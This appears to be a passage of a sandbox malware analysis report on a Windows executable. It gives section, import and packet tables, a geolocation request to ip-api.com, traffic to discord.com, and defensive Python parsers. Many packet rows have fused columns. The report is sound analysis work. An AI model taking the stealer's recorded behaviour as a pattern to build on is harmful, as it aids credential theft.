Note: the .data virtual size (0x53f8) far exceeding its raw size (0xe00) is ordinary zero-initialised data that the loader fills at run time, not a hidden payload. No section is reported as an XOR-ed embedded PE, and no entropy approaches the 7+ range typical of packed or encrypted contents; 6.49 for .text is what plain compiled code normally yields. The packed material, if any, therefore sits in the overlay rather than in these sections.
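The two tables above give enough numbers to reproduce the layout checks an analyst runs before trusting a section table: alignment and contiguity, raw-versus-virtual size, entropy, and the gap between the last section on disk and the Authenticode blob. The script below is an added example, not part of the Joe Sandbox report or of the sample; it embeds the values copied from the tables and treats FileAlignment (0x200), SectionAlignment (0x1000) and SizeOfHeaders (0x400) as assumptions, since the report does not show them.

```python
FILE_ALIGNMENT = 0x200       # assumption: typical MSVC FileAlignment (not in the report)
SECTION_ALIGNMENT = 0x1000   # assumption: typical MSVC SectionAlignment (not in the report)
SIZE_OF_HEADERS = 0x400      # assumption: the report does not show SizeOfHeaders

# (name, virtual address, virtual size, raw size, entropy) copied from the section table
SECTIONS = [
    (".text",  0x1000,  0x29f70, 0x2a000, 6.489),
    (".rdata", 0x2b000, 0x12a28, 0x12c00, 5.751),
    (".data",  0x3e000, 0x53f8,  0xe00,   1.839),
    (".pdata", 0x44000, 0x2238,  0x2400,  5.265),
    (".rsrc",  0x47000, 0x968,   0xa00,   5.075),
    (".reloc", 0x48000, 0x764,   0x800,   5.281),
]

# IMAGE_DIRECTORY_ENTRY_SECURITY from the data-directory table: (file offset, size).
# Unlike every other directory this entry is a raw file offset, not an RVA.
SECURITY_DIR = (0x5f6d2c, 0x2448)

PACKED_ENTROPY = 7.0  # above this, section contents are usually packed or encrypted


def align_up(value, alignment):
    """Round value up to the next multiple of alignment."""
    return (value + alignment - 1) // alignment * alignment


def layout_issues(sections, file_alignment=FILE_ALIGNMENT,
                  section_alignment=SECTION_ALIGNMENT):
    """Return human-readable findings about the section table: the invariants a
    loader relies on (alignment, contiguity) plus the two things an analyst
    looks at first, zero-filled tails and high entropy."""
    findings = []
    for i, (name, va, vsize, rsize, entropy) in enumerate(sections):
        if va % section_alignment:
            findings.append(f"{name}: VA {va:#x} not aligned to {section_alignment:#x}")
        if rsize % file_alignment:
            findings.append(f"{name}: raw size {rsize:#x} not a multiple of {file_alignment:#x}")
        # More than one alignment unit of virtual size beyond the raw size means the
        # loader zero-fills a tail: bss-style data, or room reserved for unpacking.
        if vsize > rsize + file_alignment:
            findings.append(f"{name}: virtual size {vsize:#x} exceeds raw size {rsize:#x} "
                            f"(zero-filled tail of {vsize - rsize:#x} bytes)")
        if entropy > PACKED_ENTROPY:
            findings.append(f"{name}: entropy {entropy:.2f} suggests packed or encrypted content")
        if i + 1 < len(sections):
            next_name, next_va = sections[i + 1][0], sections[i + 1][1]
            if align_up(va + vsize, section_alignment) != next_va:
                findings.append(f"{name}: not contiguous with {next_name} at {next_va:#x}")
    return findings


def overlay_extent(sections, security_dir, size_of_headers=SIZE_OF_HEADERS):
    """Estimate the bytes between the last section on disk and the certificate
    table, i.e. data the section table does not describe.
    Returns (end_of_section_data, overlay_size)."""
    end_of_sections = size_of_headers + sum(raw for _, _, _, raw, _ in sections)
    sig_offset, _sig_size = security_dir
    if sig_offset < end_of_sections:
        raise ValueError("security directory overlaps section data: corrupt or hostile header")
    return end_of_sections, sig_offset - end_of_sections


def expected_file_size(security_dir):
    """If the certificate table is the last thing in the file (its normal
    placement), the file must be exactly this long; a larger size on disk
    means bytes were appended after signing."""
    sig_offset, sig_size = security_dir
    return sig_offset + sig_size


if __name__ == "__main__":
    for finding in layout_issues(SECTIONS):
        print("finding:", finding)
    end, overlay = overlay_extent(SECTIONS, SECURITY_DIR)
    print(f"section data ends at {end:#x}; overlay before signature: {overlay:#x} bytes "
          f"({overlay / 2**20:.1f} MiB)")
    print(f"expected file size if the signature is last: {expected_file_size(SECURITY_DIR):#x}")
```

Run against the report's numbers it reports a single finding (the .data zero-filled tail), an overlay of 0x5b592c bytes (about 5.7 MiB) between the end of the section data at 0x41400 and the certificate table, and an expected file size of 0x5f9174; comparing that last value with the actual size on disk is the quickest way to tell whether anything was appended after the file was signed.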
Resources

Name         RVA      Size   Type                          Language  Country  ZLIB Complexity
RT_VERSION   0x470a0  0x3b8  COM executable for DOS                           0.43067226890756305
RT_MANIFEST  0x47458  0x50d  XML 1.0 document, ASCII text                     0.4694508894044857

Note: "COM executable for DOS" is a file-type guess made on the raw bytes of the VS_VERSIONINFO block that every RT_VERSION resource holds; it does not indicate embedded DOS code.
Imports

DLL           Import
USER32.dll    CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll  (no named imports listed in the report)
KERNEL32.dll  GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll  OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll     SelectObject, DeleteObject, CreateFontIndirectW

Note: the static import set is a small launcher profile: temp-directory, directory and symbolic-link handling (GetTempPathW, CreateDirectoryW, RemoveDirectoryW, CreateSymbolicLinkW), DLL search-path control (SetDllDirectoryW, LoadLibraryExW), process creation and module enumeration (CreateProcessW, K32EnumProcessModules), token and SID inspection (OpenProcessToken, GetTokenInformation, ConvertSidToStringSidW), and a minimal window/message loop. No networking library (WS2_32, WININET, WINHTTP) is imported, yet the sandbox recorded TCP traffic, so the network activity, like the credential-theft and Defender-tampering behaviour under Signatures, comes from code loaded at run time or from the child processes the launcher starts, not from this module's own imports.
TCP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 23, 2024 19:44:32.248313904 CET  49747        80         192.168.2.4      208.95.112.1
Nov 23, 2024 19:44:32.374723911 CET  80           49747      208.95.112.1     192.168.2.4
Nov 23, 2024 19:44:32.374860048 CET  49747        80         192.168.2.4      208.95.112.1
Nov 23, 2024 19:44:32.374985933 CET  49747        80         192.168.2.4      208.95.112.1
Nov 23, 2024 19:44:32.500655890 CET  80           49747      208.95.112.1     192.168.2.4
Nov 23, 2024 19:44:33.540514946 CET  80           49747      208.95.112.1     192.168.2.4
Nov 23, 2024 19:44:33.580631018 CET  49747        80         192.168.2.4      208.95.112.1
Nov 23, 2024 19:44:34.009670019 CET  49748        443        192.168.2.4      162.159.128.233
Nov 23, 2024 19:44:34.009735107 CET  443          49748      162.159.128.233  192.168.2.4
Nov 23, 2024 19:44:34.009798050 CET  49748        443        192.168.2.4      162.159.128.233
Nov 23, 2024 19:44:34.039592028 CET  49748        443        192.168.2.4      162.159.128.233
Nov 23, 2024 19:44:34.039623022 CET  443          49748      162.159.128.233  192.168.2.4
Nov 23, 2024 19:44:35.301168919 CET  443          49748      162.159.128.233  192.168.2.4
Nov 23, 2024 19:44:35.301763058 CET  49748        443        192.168.2.4      162.159.128.233
Nov 23, 2024 19:44:35.301785946 CET  443          49748      162.159.128.233  192.168.2.4
Nov 23, 2024 19:44:35.303225994 CET  443          49748      162.159.128.233  192.168.2.4
Nov 23, 2024 19:44:35.303426981 CET  49748        443        192.168.2.4      162.159.128.233
Nov 23, 2024 19:44:35.304593086 CET  49748        443        192.168.2.4      162.159.128.233
Nov 23, 2024 19:44:35.304678917 CET  443          49748      162.159.128.233  192.168.2.4

Note: the rows make up two conversations from the analysis VM (192.168.2.4): 49747 to 208.95.112.1:80 (7 packets over about 1.3 s, cleartext HTTP, so the request and response are readable in the capture) followed immediately by 49748 to 162.159.128.233:443 (12 packets over about 1.3 s). Both remote addresses are worth pivoting on in proxy and firewall logs.
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.305057049 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.305057049 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.305074930 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.305105925 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306137085 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306174040 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306574106 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306610107 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306786060 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306806087 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306833029 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306843996 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306938887 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306952000 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307058096 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307075977 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307084084 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307092905 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307106972 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307118893 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307255983 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307269096 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307347059 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307354927 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307373047 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307379961 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307395935 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307413101 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307434082 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307441950 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307459116 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307466030 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307516098 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307539940 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307832003 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307843924 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307905912 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307917118 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307933092 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307940960 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307957888 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307974100 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.308094978 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.308110952 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.308156013 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.308176994 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.308248043 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.308265924 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.308410883 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351349115 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351608992 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351623058 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351690054 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351700068 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351721048 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351727962 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351743937 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351753950 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351766109 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351775885 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351795912 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351804018 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351814032 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351820946 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351836920 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351843119 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351857901 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351866007 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351887941 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351954937 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351974010 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351990938 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.395334005 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:40.405719042 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:40.405908108 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:40.405989885 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:40.406497955 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:40.739331007 CET4974780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:40.859596014 CET8049747208.95.112.1192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:40.859656096 CET4974780192.168.2.4208.95.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 23, 2024 19:44:32.104846001 CET | 60007 | 53 | 192.168.2.4 | 1.1.1.1
Nov 23, 2024 19:44:32.247494936 CET | 53 | 60007 | 1.1.1.1 | 192.168.2.4
Nov 23, 2024 19:44:33.868581057 CET | 56954 | 53 | 192.168.2.4 | 1.1.1.1
Nov 23, 2024 19:44:34.008208990 CET | 53 | 56954 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 23, 2024 19:44:32.104846001 CET | 192.168.2.4 | 1.1.1.1 | 0xfbe | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Nov 23, 2024 19:44:33.868581057 CET | 192.168.2.4 | 1.1.1.1 | 0xc287 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 23, 2024 19:44:32.247494936 CET | 1.1.1.1 | 192.168.2.4 | 0xfbe | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Nov 23, 2024 19:44:34.008208990 CET | 1.1.1.1 | 192.168.2.4 | 0xc287 | No error (0) | discord.com |  | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Nov 23, 2024 19:44:34.008208990 CET | 1.1.1.1 | 192.168.2.4 | 0xc287 | No error (0) | discord.com |  | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Nov 23, 2024 19:44:34.008208990 CET | 1.1.1.1 | 192.168.2.4 | 0xc287 | No error (0) | discord.com |  | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Nov 23, 2024 19:44:34.008208990 CET | 1.1.1.1 | 192.168.2.4 | 0xc287 | No error (0) | discord.com |  | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Nov 23, 2024 19:44:34.008208990 CET | 1.1.1.1 | 192.168.2.4 | 0xc287 | No error (0) | discord.com |  | 162.159.137.232 | A (IP address) | IN (0x0001) | false
• discord.com
• ip-api.com
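The packet tables in this report lost their column separators during extraction: after the timestamp, a row such as "8049747208.95.112.1192.168.2.4" is Source Port, Dest Port, Source IP and Dest IP run together, and because ports and IPv4 octets are all digits the row can be split in more than one valid way. The following is an added example, not Joe Sandbox code, that recovers the columns. It assumes a set of already-known addresses (the analysis host 192.168.2.4, the resolver 1.1.1.1, and the addresses the DNS-answer table above returned) and the service ports 53, 80 and 443 as tie-breakers, and refuses to guess when a row stays ambiguous.

```python
"""Recover the columns of Joe Sandbox packet rows that were run together.

Added example; not Joe Sandbox code. Every syntactically valid split of a
row is enumerated, the one agreeing best with known addresses and service
ports is kept, and a row that is still ambiguous is rejected, not guessed.
"""
import re
from collections import Counter
from dataclasses import dataclass
from itertools import product

TS_RE = re.compile(r"^([A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]{3,4})(\d.*)$")

# Assumed context for this report: analysis host, resolver and DNS-answer addresses.
KNOWN_IPS = frozenset({"192.168.2.4", "1.1.1.1", "208.95.112.1", "162.159.128.233"})
SERVICE_PORTS = frozenset({53, 80, 443})
LOCAL_IP = "192.168.2.4"


@dataclass(frozen=True)
class Packet:
    ts: str
    src_port: int
    dst_port: int
    src_ip: str
    dst_ip: str


class AmbiguousRow(ValueError):
    """Raised when two splits are equally plausible."""


def _is_port(s: str) -> bool:
    return s.isdigit() and not s.startswith("0") and int(s) <= 65535


def _is_ipv4(s: str) -> bool:
    parts = s.split(".")
    return len(parts) == 4 and all(
        p.isdigit() and (p == "0" or not p.startswith("0")) and int(p) <= 255
        for p in parts)


def candidate_splits(blob: str) -> list:
    """Every (src_port, dst_port, src_ip, dst_ip) the token could encode."""
    found = []
    for i, j in product(range(1, 6), repeat=2):      # a port is 1..5 digits
        p1, p2, rest = blob[:i], blob[i:i + j], blob[i + j:]
        if not (_is_port(p1) and _is_port(p2)):
            continue
        for k in range(7, 16):                        # an IPv4 literal is 7..15 chars
            ip1, ip2 = rest[:k], rest[k:]
            if _is_ipv4(ip1) and _is_ipv4(ip2):
                found.append((int(p1), int(p2), ip1, ip2))
    return found


def _score(cand, known_ips, service_ports):
    sp, dp, sip, dip = cand
    # Prefer more known addresses, then a recognised service port on either side.
    return ((sip in known_ips) + (dip in known_ips),
            (sp in service_ports) + (dp in service_ports))


def parse_row(row: str, known_ips=KNOWN_IPS, service_ports=SERVICE_PORTS) -> Packet:
    m = TS_RE.match(row.strip())
    if not m:
        raise ValueError(f"no timestamp prefix: {row!r}")
    ts, blob = m.groups()
    ranked = sorted(candidate_splits(blob),
                    key=lambda c: _score(c, known_ips, service_ports), reverse=True)
    if not ranked:
        raise ValueError(f"no valid split: {blob!r}")
    if len(ranked) > 1 and _score(ranked[0], known_ips, service_ports) == _score(
            ranked[1], known_ips, service_ports):
        raise AmbiguousRow(f"{blob!r}: {ranked[0]} or {ranked[1]}")
    return Packet(ts, *ranked[0])


def is_ambiguous(row: str, known_ips=frozenset(), service_ports=frozenset()) -> bool:
    """True when the row cannot be split without the context hints."""
    try:
        parse_row(row, known_ips, service_ports)
    except AmbiguousRow:
        return True
    return False


def flow_summary(rows, local_ip=LOCAL_IP) -> dict:
    """Packets per bidirectional flow, sandbox-side endpoint written first."""
    counts = Counter()
    for row in rows:
        p = parse_row(row)
        ends = [(p.src_ip, p.src_port), (p.dst_ip, p.dst_port)]
        ends.sort(key=lambda e: e[0] != local_ip)     # local endpoint first
        counts["%s:%d <-> %s:%d" % (*ends[0], *ends[1])] += 1
    return dict(counts)


# Rows copied from the TCP and UDP packet tables above.
SAMPLE_ROWS = [
    "Nov 23, 2024 19:44:33.540514946 CET8049747208.95.112.1192.168.2.4",
    "Nov 23, 2024 19:44:33.580631018 CET4974780192.168.2.4208.95.112.1",
    "Nov 23, 2024 19:44:34.009670019 CET49748443192.168.2.4162.159.128.233",
    "Nov 23, 2024 19:44:34.009735107 CET44349748162.159.128.233192.168.2.4",
    "Nov 23, 2024 19:44:32.104846001 CET6000753192.168.2.41.1.1.1",
    "Nov 23, 2024 19:44:32.247494936 CET53600071.1.1.1192.168.2.4",
]

if __name__ == "__main__":
    for flow, n in flow_summary(SAMPLE_ROWS).items():
        print(f"{n:3d}  {flow}")
```

Without the hints the first sample row has nine valid splits (80/49747, 804/9747 and 8049/747 combined with three ways of cutting the IP text), which is why `is_ambiguous` returns true for it; with the hints the scoring picks 80 and 49747 between 208.95.112.1 and 192.168.2.4, matching the session table below. The same enumeration-plus-context approach works for the DNS tables, whose Source IP and Dest IP columns are fused the same way.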
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49747 | 208.95.112.1 | 80 | 7280 | C:\Users\user\Desktop\cmd.exe
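Session 0 above is the sample (cmd.exe, PID 7280) talking to ip-api.com over plain HTTP; the request it sent is printed in the data table that follows. The block below is an added example, not Joe Sandbox code, that parses a request as the report prints it (request line, then headers) and states why it reads as an automated geolocation lookup rather than browser traffic. The indicator lists are assumptions limited to what this report shows, and the benign comparison request is constructed.

```python
"""Classify an HTTP request printed in a Joe Sandbox session table.

Added example, not Joe Sandbox code. The indicator lists below are
assumptions drawn only from the request shown in this report.
"""
from urllib.parse import parse_qsl, urlsplit

GEOLOCATION_HOSTS = {"ip-api.com"}                       # assumed list
SCRIPTED_UA_PREFIXES = ("python-urllib3/", "python-requests/")  # assumed list


def parse_request(raw: str) -> dict:
    """Split 'METHOD target HTTP/1.1' plus 'Name: value' header lines."""
    lines = [l for l in raw.replace("\r\n", "\n").split("\n") if l.strip()]
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {
        "method": method,
        "path": parts.path,
        "query": dict(parse_qsl(parts.query)),
        "host": headers.get("host", "").lower(),
        "user_agent": headers.get("user-agent", ""),
        "headers": headers,
    }


def classify_http_request(raw: str, port: int = 80) -> dict:
    """Return the parsed request plus the reasons it looks automated."""
    req = parse_request(raw)
    reasons = []
    if req["host"] in GEOLOCATION_HOSTS:
        reasons.append("geolocation_api")    # victim location looked up first
    if req["user_agent"].startswith(SCRIPTED_UA_PREFIXES):
        reasons.append("scripted_client")    # HTTP library UA, not a browser
    if port == 80:
        reasons.append("cleartext_http")     # the JSON reply is readable on the wire
    req["reasons"] = reasons
    return req


# Request text copied from the session data table of this report.
SAMPLE_REQUEST = (
    "GET /json/?fields=225545 HTTP/1.1\r\n"
    "Host: ip-api.com\r\n"
    "Accept-Encoding: identity\r\n"
    "User-Agent: python-urllib3/2.2.3\r\n"
)

# Constructed benign comparison, not from the report.
BROWSER_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
)

if __name__ == "__main__":
    print(classify_http_request(SAMPLE_REQUEST)["reasons"])
```

The host and user-agent checks are the ones worth carrying into a proxy or NDR rule: a Python HTTP library fetching a public IP-geolocation endpoint is the kind of first contact a stealer makes before it touches its real exfiltration channel, and it is cheap to alert on without any knowledge of the C2.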
Timestamp | Bytes transferred | Direction | Data
Nov 23, 2024 19:44:32.374985933 CET | 116 | OUT | GET /json/?fields=225545 HTTP/1.1
    Host: ip-api.com
    Accept-Encoding: identity
    User-Agent: python-urllib3/2.2.3
Nov 23, 2024 19:44:33.540514946 CET | 379 | IN | HTTP/1.1 200 OK
    Date: Sat, 23 Nov 2024 18:44:33 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 202
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    X-Ttl: 60
                                                                                                                                                                                                                                    X-Rl: 44
                                                                                                                                                                                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-75.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.75"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
